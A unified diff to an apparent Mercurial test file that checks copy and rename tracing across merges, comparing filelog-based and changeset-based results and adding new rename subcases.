$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCBm-1")'
M b
A d
+ A t
+ p
R a
+ R p
Comparing with a merge re-adding the file afterward
---------------------------------------------------
@@ -1074,21 +2284,21 @@
- one deleting and recreating the change
$ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))'
- o 18 mDBm-0 simple merge - the other way
+ o mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way
|\
- +---o 17 mBDm-0 simple merge - one way
+ +---o mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way
| |/
- | o 8 d-2 re-add d
+ | o d-2 re-add d
| |
- | o 7 d-1 delete d
+ | o d-1 delete d
| |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
$ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBDm-0")'
M d
@@ -1115,93 +2325,102 @@
$ hg manifest --debug --rev 'desc("d-2")' | grep '644 d'
b004912a8510032a0350a74daa2803dadfb00e12 644 d
$ hg manifest --debug --rev 'desc("b-1")' | grep '644 d'
- 169be882533bc917905d46c0c951aa9a1e288dcf 644 d (no-changeset !)
- b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3 644 d (changeset !)
- $ hg debugindex d | head -n 4
+ d8252ab2e760b0d4e5288fd44cbd15a0fa567e16 644 d (no-changeset !)
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 d (changeset !)
+ $ hg debugindex d | head -n 4 | ../no-linkrev
rev linkrev nodeid p1 p2
- 0 2 169be882533b 000000000000 000000000000 (no-changeset !)
- 0 2 b789fdd96dc2 000000000000 000000000000 (changeset !)
- 1 8 b004912a8510 000000000000 000000000000
- 2 22 4a067cf8965d 000000000000 000000000000 (no-changeset !)
- 2 22 fe6f8b4f507f 000000000000 000000000000 (changeset !)
+ 0 * d8252ab2e760 000000000000 000000000000 (no-changeset !)
+ 0 * ae258f702dfe 000000000000 000000000000 (changeset !)
+ 1 * b004912a8510 000000000000 000000000000
+ 2 * 7b79e2fe0c89 000000000000 000000000000 (no-changeset !)
+ 2 * 5cce88bf349f ae258f702dfe 000000000000 (changeset !)
Log output should not include a merge commit as it did not happen
$ hg log -Gfr 'desc("mBDm-0")' d
- o 8 d-2 re-add d
+ o d-2 re-add d
|
~
$ hg log -Gfr 'desc("mDBm-0")' d
- o 8 d-2 re-add d
+ o d-2 re-add d
|
~
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBDm-0")'
M b
A d
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mDBm-0")'
M b
A d
+ A t
+ p
R a
+ R p
Comparing with a merge with colliding rename
--------------------------------------------
+Subcase: new copy information on both side
+``````````````````````````````````````````
+
- the "e-" branch renaming b to f (through 'g')
- the "a-" branch renaming d to f (through e)
$ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))'
- o 20 mEAm-0 simple merge - the other way
+ o mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way
|\
- +---o 19 mAEm-0 simple merge - one way
+ +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way
| |/
- | o 10 e-2 g -move-> f
+ | o e-2 g -move-> f
| |
- | o 9 e-1 b -move-> g
+ | o e-1 b -move-> g
| |
- o | 4 a-2: e -move-> f
+ o | a-2: e -move-> f
| |
- o | 3 a-1: d -move-> e
+ o | a-1: d -move-> e
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
#if no-changeset
$ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f'
- c39c6083dad048d5138618a46f123e2f397f4f18 644 f
+ 2ff93c643948464ee1f871867910ae43a45b0bea 644 f
$ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f'
- a9a8bc3860c9d8fa5f2f7e6ea8d40498322737fd 644 f
+ 2ff93c643948464ee1f871867910ae43a45b0bea 644 f
$ hg manifest --debug --rev 'desc("a-2")' | grep '644 f'
- 263ea25e220aaeb7b9bac551c702037849aa75e8 644 f
+ b76eb76580df486c3d51d63c5c210d4dd43a8ac7 644 f
$ hg manifest --debug --rev 'desc("e-2")' | grep '644 f'
- 71b9b7e73d973572ade6dd765477fcee6890e8b1 644 f
- $ hg debugindex f
+ e8825b386367b29fec957283a80bb47b47483fe1 644 f
+ $ hg debugindex f | ../no-linkrev
rev linkrev nodeid p1 p2
- 0 4 263ea25e220a 000000000000 000000000000
- 1 10 71b9b7e73d97 000000000000 000000000000
- 2 19 c39c6083dad0 263ea25e220a 71b9b7e73d97
- 3 20 a9a8bc3860c9 71b9b7e73d97 263ea25e220a
+ 0 * b76eb76580df 000000000000 000000000000
+ 1 * e8825b386367 000000000000 000000000000
+ 2 * 2ff93c643948 b76eb76580df e8825b386367
+ 3 * 2f649fba7eb2 b76eb76580df e8825b386367
+ 4 * 774e7c1637d5 e8825b386367 b76eb76580df
#else
$ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f'
- 498e8799f49f9da1ca06bb2d6d4accf165c5b572 644 f
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f
$ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f'
- c5b506a7118667a38a9c9348a1f63b679e382f57 644 f
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f
$ hg manifest --debug --rev 'desc("a-2")' | grep '644 f'
- b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3 644 f
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f
$ hg manifest --debug --rev 'desc("e-2")' | grep '644 f'
- 1e88685f5ddec574a34c70af492f95b6debc8741 644 f
- $ hg debugindex f
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f
+ $ hg debugindex f | ../no-linkrev
rev linkrev nodeid p1 p2
- 0 4 b789fdd96dc2 000000000000 000000000000
- 1 10 1e88685f5dde 000000000000 000000000000
- 2 19 498e8799f49f b789fdd96dc2 1e88685f5dde
- 3 20 c5b506a71186 1e88685f5dde b789fdd96dc2
+ 0 * ae258f702dfe 000000000000 000000000000
+ 1 * d3613c1ec831 ae258f702dfe 000000000000
+ 2 * 05e03c868bbc ae258f702dfe 000000000000
#endif
# Here the filelog based implementation is not looking at the rename
@@ -1209,20 +2428,20 @@
# based on works fine. We have different output.
$ hg status --copies --rev 'desc("a-2")' --rev 'desc("mAEm-0")'
- M f
- b (no-filelog !)
+ M f (no-changeset !)
+ b (no-filelog no-changeset !)
R b
$ hg status --copies --rev 'desc("a-2")' --rev 'desc("mEAm-0")'
- M f
- b (no-filelog !)
+ M f (no-changeset !)
+ b (no-filelog no-changeset !)
R b
$ hg status --copies --rev 'desc("e-2")' --rev 'desc("mAEm-0")'
- M f
- d (no-filelog !)
+ M f (no-changeset !)
+ d (no-filelog no-changeset !)
R d
$ hg status --copies --rev 'desc("e-2")' --rev 'desc("mEAm-0")'
- M f
- d (no-filelog !)
+ M f (no-changeset !)
+ d (no-filelog no-changeset !)
R d
$ hg status --copies --rev 'desc("i-2")' --rev 'desc("a-2")'
A f
@@ -1258,15 +2477,24 @@
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAEm-0")'
A f
a
+ A t
+ p
R a
R b
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEAm-0")'
A f
a (filelog !)
b (no-filelog !)
+ A t
+ p
R a
R b
-
+ R p
+
+
+Subcase: existing copy information overwritten on one branch
+````````````````````````````````````````````````````````````
Note:
| In this case, one of the merge wrongly record a merge while there is none.
@@ -1278,90 +2506,196 @@
- one overwriting a file (d) with a rename (from h to i to d)
$ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))'
- o 24 mFBm-0 simple merge - the other way
+ o mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
|\
- +---o 23 mBFm-0 simple merge - one way
+ +---o mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
| |/
- | o 22 f-2: rename i -> d
+ | o f-2: rename i -> d
| |
- | o 21 f-1: rename h -> i
+ | o f-1: rename h -> i
| |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBFm-0")'
M b
A d
h
+ A t
+ p
R a
R h
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFBm-0")'
M b
A d
h
+ A t
+ p
R a
R h
+ R p
$ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBFm-0")'
- M d
- h (no-filelog !)
+ M d (no-changeset !)
+ h (no-filelog no-changeset !)
R h
$ hg status --copies --rev 'desc("f-2")' --rev 'desc("mBFm-0")'
M b
$ hg status --copies --rev 'desc("f-1")' --rev 'desc("mBFm-0")'
M b
- M d
- i (no-filelog !)
+ M d (no-changeset !)
+ i (no-filelog no-changeset !)
R i
$ hg status --copies --rev 'desc("b-1")' --rev 'desc("mFBm-0")'
- M d
- h (no-filelog !)
+ M d (no-changeset !)
+ h (no-filelog no-changeset !)
R h
$ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFBm-0")'
M b
$ hg status --copies --rev 'desc("f-1")' --rev 'desc("mFBm-0")'
M b
- M d
- i (no-filelog !)
+ M d (no-changeset !)
+ i (no-filelog no-changeset !)
R i
#if no-changeset
$ hg log -Gfr 'desc("mBFm-0")' d
- o 22 f-2: rename i -> d
+ o f-2: rename i -> d
|
- o 21 f-1: rename h -> i
+ o f-1: rename h -> i
:
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
#else
BROKEN: `hg log --follow <file>` relies on filelog metadata to work
$ hg log -Gfr 'desc("mBFm-0")' d
- o 22 f-2: rename i -> d
+ o i-2: c -move-> d, s -move-> t
|
~
#endif
#if no-changeset
$ hg log -Gfr 'desc("mFBm-0")' d
- o 22 f-2: rename i -> d
+ o f-2: rename i -> d
|
- o 21 f-1: rename h -> i
+ o f-1: rename h -> i
:
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
#else
BROKEN: `hg log --follow <file>` relies on filelog metadata to work
$ hg log -Gfr 'desc("mFBm-0")' d
- o 22 f-2: rename i -> d
+ o i-2: c -move-> d, s -move-> t
|
~
#endif
+Subcase: existing copy information overwritten on one branch, with different content)
+`````````````````````````````````````````````````````````````````````````````````````
+
+Merge:
+- one with change to an unrelated file (b)
+- one overwriting a file (t) with a rename (from r to x to t), v content is not the same as on the other branch
+
+ $ hg log -G --rev '::(desc("mBRm")+desc("mRBm"))'
+ o mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way
+ |\
+ +---o mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way
+ | |/
+ | o r-2: rename t -> x
+ | |
+ | o r-1: rename r -> x
+ | |
+ o | b-1: b update
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBRm-0")'
+ M b
+ A d
+ a
+ A t
+ r
+ R a
+ R p
+ R r
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mRBm-0")'
+ M b
+ A d
+ a
+ A t
+ r
+ R a
+ R p
+ R r
+ $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBRm-0")'
+ M t
+ r (no-filelog !)
+ R r
+ $ hg status --copies --rev 'desc("r-2")' --rev 'desc("mBRm-0")'
+ M b
+ $ hg status --copies --rev 'desc("r-1")' --rev 'desc("mBRm-0")'
+ M b
+ M t
+ x (no-filelog !)
+ R x
+ $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mRBm-0")'
+ M t
+ r (no-filelog !)
+ R r
+ $ hg status --copies --rev 'desc("r-2")' --rev 'desc("mRBm-0")'
+ M b
+ $ hg status --copies --rev 'desc("r-1")' --rev 'desc("mRBm-0")'
+ M b
+ M t
+ x (no-filelog !)
+ R x
+
+#if no-changeset
+ $ hg log -Gfr 'desc("mBRm-0")' d
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+#else
+BROKEN: `hg log --follow <file>` relies on filelog metadata to work
+ $ hg log -Gfr 'desc("mBRm-0")' d
+ o i-2: c -move-> d, s -move-> t
+ |
+ ~
+#endif
+
+#if no-changeset
+ $ hg log -Gfr 'desc("mRBm-0")' d
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+#else
+BROKEN: `hg log --follow <file>` relies on filelog metadata to work
+ $ hg log -Gfr 'desc("mRBm-0")' d
+ o i-2: c -move-> d, s -move-> t
+ |
+ ~
+#endif
+
+Subcase: reset of the copy history on one side
+``````````````````````````````````````````````
+
Merge:
- one with change to a file
- one deleting and recreating the file
@@ -1370,21 +2704,21 @@
consider history and rename on both branch of the merge.
$ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))'
- o 27 mGDm-0 simple merge - the other way
+ o mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way
|\
- +---o 26 mDGm-0 simple merge - one way
+ +---o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way
| |/
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 8 d-2 re-add d
+ o | d-2 re-add d
| |
- o | 7 d-1 delete d
+ o | d-1 delete d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
One side of the merge have a long history with rename. The other side of the
merge point to a new file with a smaller history. Each side is "valid".
@@ -1395,11 +2729,17 @@
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mDGm-0")'
A d
a (filelog !)
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGDm-0")'
A d
a
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("d-2")' --rev 'desc("mDGm-0")'
M d
$ hg status --copies --rev 'desc("d-2")' --rev 'desc("mGDm-0")'
@@ -1411,28 +2751,28 @@
#if no-changeset
$ hg log -Gfr 'desc("mDGm-0")' d
- o 26 mDGm-0 simple merge - one way
+ o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way
|\
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 8 d-2 re-add d
+ o | d-2 re-add d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
#else
BROKEN: `hg log --follow <file>` relies on filelog metadata to work
$ hg log -Gfr 'desc("mDGm-0")' d
- o 26 mDGm-0 simple merge - one way
+ o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way
|\
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 8 d-2 re-add d
+ o | d-2 re-add d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
~
#endif
@@ -1440,32 +2780,34 @@
#if no-changeset
$ hg log -Gfr 'desc("mDGm-0")' d
- o 26 mDGm-0 simple merge - one way
+ o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way
|\
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 8 d-2 re-add d
+ o | d-2 re-add d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
#else
BROKEN: `hg log --follow <file>` relies on filelog metadata to work
$ hg log -Gfr 'desc("mDGm-0")' d
- o 26 mDGm-0 simple merge - one way
+ o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way
|\
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 8 d-2 re-add d
+ o | d-2 re-add d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
~
#endif
+Subcase: merging a change to a file with a "copy overwrite" to that file from another branch
+````````````````````````````````````````````````````````````````````````````````````````````
Merge:
- one with change to a file (d)
@@ -1476,21 +2818,21 @@
$ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))'
- o 29 mGFm-0 simple merge - the other way
+ o mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way
|\
- +---o 28 mFGm-0 simple merge - one way
+ +---o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way
| |/
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 22 f-2: rename i -> d
+ o | f-2: rename i -> d
| |
- o | 21 f-1: rename h -> i
+ o | f-1: rename h -> i
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
Note:
@@ -1504,15 +2846,15 @@
Details on this hash ordering pick:
$ hg manifest --debug 'desc("g-1")' | egrep 'd$'
- f2b277c39e0d2bbac99d8aae075c0d8b5304d266 644 d (no-changeset !)
- 4ff57b4e8dceedb487e70e6965ea188a7c042cca 644 d (changeset !)
+ 17ec97e605773eb44a117d1136b3849bcdc1924f 644 d (no-changeset !)
+ 5cce88bf349f7c742bb440f2c53f81db9c294279 644 d (changeset !)
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("g-1")' d
A d
a (no-changeset no-compatibility !)
$ hg manifest --debug 'desc("f-2")' | egrep 'd$'
- 4a067cf8965d1bfff130057ade26b44f580231be 644 d (no-changeset !)
- fe6f8b4f507fe3eb524c527192a84920a4288dac 644 d (changeset !)
+ 7b79e2fe0c8924e0e598a82f048a7b024afa4d96 644 d (no-changeset !)
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 d (changeset !)
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("f-2")' d
A d
h (no-changeset no-compatibility !)
@@ -1521,15 +2863,22 @@
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFGm-0")'
A d
- h
+ h (no-filelog !)
+ a (filelog !)
+ A t
+ p
R a
R h
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm-0")'
A d
- a (no-filelog !)
- h (filelog !)
+ a (no-changeset !)
+ h (changeset !)
+ A t
+ p
R a
R h
+ R p
$ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFGm-0")'
M d
$ hg status --copies --rev 'desc("f-2")' --rev 'desc("mGFm-0")'
@@ -1543,74 +2892,194 @@
i (no-filelog !)
R i
$ hg status --copies --rev 'desc("g-1")' --rev 'desc("mFGm-0")'
- M d
- h (no-filelog !)
+ M d (no-changeset !)
+ h (no-filelog no-changeset !)
R h
$ hg status --copies --rev 'desc("g-1")' --rev 'desc("mGFm-0")'
- M d
- h (no-filelog !)
+ M d (no-changeset !)
+ h (no-filelog no-changeset !)
R h
#if no-changeset
$ hg log -Gfr 'desc("mFGm-0")' d
- o 28 mFGm-0 simple merge - one way
+ o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way
|\
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 22 f-2: rename i -> d
+ o | f-2: rename i -> d
| |
- o | 21 f-1: rename h -> i
+ o | f-1: rename h -> i
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
#else
BROKEN: `hg log --follow <file>` relies on filelog metadata to work
$ hg log -Gfr 'desc("mFGm-0")' d
- o 28 mFGm-0 simple merge - one way
- |\
- | o 25 g-1: update d
- | |
- o | 22 f-2: rename i -> d
- |/
- o 2 i-2: c -move-> d
+ o g-1: update d
+ |
+ o i-2: c -move-> d, s -move-> t
|
~
#endif
#if no-changeset
$ hg log -Gfr 'desc("mGFm-0")' d
- o 29 mGFm-0 simple merge - the other way
+ o mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way
|\
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 22 f-2: rename i -> d
+ o | f-2: rename i -> d
| |
- o | 21 f-1: rename h -> i
+ o | f-1: rename h -> i
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
#else
BROKEN: `hg log --follow <file>` relies on filelog metadata to work
$ hg log -Gfr 'desc("mGFm-0")' d
- o 29 mGFm-0 simple merge - the other way
- |\
- | o 25 g-1: update d
- | |
- o | 22 f-2: rename i -> d
- |/
- o 2 i-2: c -move-> d
+ o g-1: update d
+ |
+ o i-2: c -move-> d, s -move-> t
|
~
#endif
+Subcase: new copy information on both side with an actual merge happening
+`````````````````````````````````````````````````````````````````````````
+
+- the "p-" branch renaming 't' to 'v' (through 'u')
+- the "q-" branch renaming 'r' to 'v' (through 'w')
+
+
+ $ hg log -G --rev '::(desc("mPQm")+desc("mQPm"))'
+ o mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way
+ |\
+ +---o mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way
+ | |/
+ | o q-2 w -move-> v
+ | |
+ | o q-1 r -move-> w
+ | |
+ o | p-2: u -move-> v
+ | |
+ o | p-1: t -move-> u
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+#if no-changeset
+ $ hg manifest --debug --rev 'desc("mPQm-0")' | grep '644 v'
+ 0946c662ef16e4e67397fd717389eb6693d41749 644 v
+ $ hg manifest --debug --rev 'desc("mQPm-0")' | grep '644 v'
+ 0db3aad7fcc1ec27fab57060e327b9e864ea0cc9 644 v
+ $ hg manifest --debug --rev 'desc("p-2")' | grep '644 v'
+ 3f91841cd75cadc9a1f1b4e7c1aa6d411f76032e 644 v
+ $ hg manifest --debug --rev 'desc("q-2")' | grep '644 v'
+ c43c088b811fd27983c0a9aadf44f3343cd4cd7e 644 v
+ $ hg debugindex v | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * 3f91841cd75c 000000000000 000000000000
+ 1 * c43c088b811f 000000000000 000000000000
+ 2 * 0946c662ef16 3f91841cd75c c43c088b811f
+ 3 * 0db3aad7fcc1 c43c088b811f 3f91841cd75c
+#else
+ $ hg manifest --debug --rev 'desc("mPQm-0")' | grep '644 v'
+ 65fde9f6e4d4da23b3f610e07b53673ea9541d75 644 v
+ $ hg manifest --debug --rev 'desc("mQPm-0")' | grep '644 v'
+ a098dda6413aecf154eefc976afc38b295acb7e5 644 v
+ $ hg manifest --debug --rev 'desc("p-2")' | grep '644 v'
+ 5aed6a8dbff0301328c08360d24354d3d064cf0d 644 v
+ $ hg manifest --debug --rev 'desc("q-2")' | grep '644 v'
+ a38b2fa170219750dac9bc7d19df831f213ba708 644 v
+ $ hg debugindex v | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * 5aed6a8dbff0 000000000000 000000000000
+ 1 * a38b2fa17021 000000000000 000000000000
+ 2 * 65fde9f6e4d4 5aed6a8dbff0 a38b2fa17021
+ 3 * a098dda6413a a38b2fa17021 5aed6a8dbff0
+#endif
+
+# Here the filelog based implementation is not looking at the rename
+# information (because the file exist on both side). However the changelog
+# based on works fine. We have different output.
+
+ $ hg status --copies --rev 'desc("p-2")' --rev 'desc("mPQm-0")'
+ M v
+ r (no-filelog !)
+ R r
+ $ hg status --copies --rev 'desc("p-2")' --rev 'desc("mQPm-0")'
+ M v
+ r (no-filelog !)
+ R r
+ $ hg status --copies --rev 'desc("q-2")' --rev 'desc("mPQm-0")'
+ M v
+ t (no-filelog !)
+ R t
+ $ hg status --copies --rev 'desc("q-2")' --rev 'desc("mQPm-0")'
+ M v
+ t (no-filelog !)
+ R t
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("p-2")'
+ A v
+ t
+ R t
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("q-2")'
+ A v
+ r
+ R r
+
+# From here, we run status against revision where both source file exists.
+#
+# The filelog based implementation picks an arbitrary side based on revision
+# numbers. So the same side "wins" whatever the parents order is. This is
+# sub-optimal because depending on revision numbers means the result can be
+# different from one repository to the next.
+#
+# The changeset based algorithm use the parent order to break tie on conflicting
+# information and will have a different order depending on who is p1 and p2.
+# That order is stable accross repositories. (data from p1 prevails)
+
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mPQm-0")'
+ A v
+ t
+ R r
+ R t
+ $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mQPm-0")'
+ A v
+ t (filelog !)
+ r (no-filelog !)
+ R r
+ R t
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQm-0")'
+ A d
+ a
+ A v
+ r (filelog !)
+ p (no-filelog !)
+ R a
+ R p
+ R r
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQPm-0")'
+ A d
+ a
+ A v
+ r
+ R a
+ R p
+ R r
+
Comparing with merging with a deletion (and keeping the file)
-------------------------------------------------------------
@@ -1624,19 +3093,19 @@
copy tracing chain.
$ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))'
- o 31 mGCm-0
+ o mGCm-0 merge updated/deleted - revive the file (updated content) - the other way
|\
- +---o 30 mCGm-0
+ +---o mCGm-0 merge updated/deleted - revive the file (updated content) - one way
| |/
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 6 c-1 delete d
+ o | c-1 delete d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
'a' is the copy source of 'd'
@@ -1644,11 +3113,17 @@
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCGm-0")'
A d
a (no-compatibility no-changeset !)
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGCm-0")'
A d
a (no-compatibility no-changeset !)
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCGm-0")'
A d
$ hg status --copies --rev 'desc("c-1")' --rev 'desc("mGCm-0")'
@@ -1669,19 +3144,19 @@
copy tracing chain.
$ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))'
- o 33 mBC-revert-m-0
+ o mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way
|\
- +---o 32 mCB-revert-m-0
+ +---o mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way
| |/
- | o 6 c-1 delete d
+ | o c-1 delete d
| |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
'a' is the the copy source of 'd'
@@ -1690,12 +3165,18 @@
M b
A d
a (no-compatibility no-changeset !)
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")'
M b
A d
a (no-compatibility no-changeset !)
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCB-revert-m-0")'
M b
A d
@@ -1715,31 +3196,37 @@
(the copy information from the branch that was not deleted should win).
$ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))'
- o 36 mHC-delete-before-conflict-m-0
+ o mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way
|\
- +---o 35 mCH-delete-before-conflict-m-0
+ +---o mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way
| |/
- | o 34 h-1: b -(move)-> d
+ | o h-1: b -(move)-> d
| |
- o | 6 c-1 delete d
+ o | c-1 delete d
| |
- o | 2 i-2: c -move-> d
+ o | i-2: c -move-> d, s -move-> t
| |
- o | 1 i-1: a -move-> c
+ o | i-1: a -move-> c, p -move-> s
|/
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCH-delete-before-conflict-m")'
A d
b (no-compatibility no-changeset !)
+ A t
+ p
R a
R b
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mHC-delete-before-conflict-m")'
A d
b
+ A t
+ p
R a
R b
+ R p
